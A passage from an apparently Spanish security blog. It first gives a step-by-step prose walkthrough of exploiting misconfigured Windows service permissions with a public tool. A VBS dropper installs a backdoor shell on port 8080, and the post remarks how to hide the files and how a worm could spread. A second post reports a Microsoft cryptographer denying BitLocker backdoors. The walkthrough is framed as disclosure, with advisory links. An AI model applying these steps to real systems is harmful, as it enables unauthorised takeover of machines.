    haxorcitos se listan los servicios vulnerables en la misma (la modesta
    suma de 301).
    En la imagen (bol34_01.png) se remarca el servicio elegido para ser
    atacado. Se seleccionó este porque luego se lo podrá desactivar sin
    graves consecuencias a la estabilidad del sistema. Si se eligiera DCOM
    o NETBios el sistema atacado debería ser restaurado o reinstalado casi
    con seguridad debido a la inestabilidad que puede ocasionar el ataque.

    PASO 2. Se ejecuta la herramienta indicando la víctima y el servicio
    mencionado anteriormente. El exploit se ejecuta correctamente y se nos
    informa que podemos conectarnos a nuestra víctima a través del puerto
    8080 (bol34_02.png).

    PASO 3. Antes de conectarnos vemos las consecuencias en el Windows víctima.
    Al visualizar el servicio UPS (Sistema de Alimentación Ininterrumpida)
    podemos ver el código que se ejecutará al iniciar el servicio. Se
    puede ver que se creará un directorio "HXR" y dentro del mismo un
    script con extensión VBS con un código fuente que veremos luego
    En el caso de una víctima real, esta nunca hubiera percibido el ataque
    a menos que fuera a controlar específicamente este servicio.
    También consideremos que esto es una prueba de concepto por lo que la
    carpeta es fácilmente identificable. Si hubiera sido una carpeta del
    sistema, nunca lo hubiéramos notado.

    PASO 4. Aquí podemos apreciar el código fuente del script VBS mencionado.
    Si lo seguimos podremos ver que el mismo crea un archivo "\HXR\a.exe"
    con el contenido del exploit propiamente dicho. Como antes, este
    archivo podría haber tenido un nombre parecido a algún archivo de
    sistema y no lo hubiéramos notado (bol34_04.png).
    Además también podemos ver como se ha modificado el servicio UPS en el
    registro de Windows (bol34_07.png).

    PASO 5. El momento esperado. Nos conectamos a la víctima al puerto
    mencionado. Como vemos se nos devuelve una shell a "c:\windows\system32"
    lo que nos indica que estamos dentro del sistema con los mismos
    privilegios que el servicio explotado, en este caso "LocalService"
    (bol34_05.png).
    Para demostrar el acceso hemos creado un directorio "c:\hack".
    En bol34_06.png puede verse los dos directorios creados: el primero
    "c:\hxr" para realizar el ataque y el segundo "c:\hack" creado
    manualmente.

    Conclusión:
    Por algún extraño motivo este paper no se ha difundido en la forma en
    que se esperaría para un documento cuya aplicación directa permite
    la elevación de privilegios de usuarios y aplicaciones.
    Es posible automatizar este ataque y creo no equivocarme al decir que
    si un gusano se aprovecha de esta "vulnerabilidad" las consecuencias
    podrían ser desastrosas ya que, como se vio, es posible tomar control
    total del equipo atacado.
    Esto daría lugar a una extensa propagación y a la creación de millones
    de PC zombies utilizables para fines delictivos.

    Más información:
    http://www.haxorcitos.com/ficheros.html#SRVCHECK2
    http://cyruxnet.org/archivo.php?20060203.00
    http://cyruxnet.org/archivo.php?20060204.00
    http://cyruxnet.org/archivo.php?20060213.00
    http://www.hispasec.com/unaaldia/2660/n
    http://www.microsoft.com/technet/security/advisory/914457.mspx
    A Black-Box Tracing Technique to Identify Causes of Least-Privilege Incompatibilities
    http://research.microsoft.com/~shuochen/papers/chen-ndss05.pdf
    Windows Access Control Demystified
    http://www.cs.princeton.edu/~sudhakar/papers/winval.pdf

    Fuente: http://www.segu-info.com.ar (pagina altamente recomendable como favorita)

    Salu2

    sábado, marzo 04, 2006

    "¿Puertas traseras en Windows Vista? ¡Por encima de mi cadáver...!"

    Quien así se manifiesta es Niels Ferguson, criptógrafo holandés que trabaja para Microsoft, en respuesta a recientes informaciones sobre la posibilidad de que el Reino Unido hubiera solicitado que existiese una puerta trasera en Windows Vista para que los cuerpos de seguridad pudieran acceder a los datos cifrados con BitLocker.

    Bitlocker es la tecnología de cifrado con la que Windows Vista tratará de impedir que -por ejemplo- un extraño pueda acceder a la información contenida en el disco duro de un portátil que ha sido robado o extraviado.

    Ferguson reconoce la existencia de contactos entre Microsoft y los cuerpos de seguridad de varios gobiernos, pero únicamente para convencerles de que compren y utilicen el producto, y para responder a sus dudas en cuanto a su seguridad...

    Según Ferguson se trata de explicar a la policía cosas tan básicas como que no olviden recoger también en sus registros elementos como las llaves USB, que podrían contener la clave utilizada con Bitlocker.

    NOTA: Para conocer mejor los detalles de Bitlocker es muy recomendable esta entrevista con miembros del equipo de desarrollo del producto, que acaba de publicarse y se presenta como una sección de Preguntas y Respuestas

    Origen: kriptopolis

    ecoestadistica.com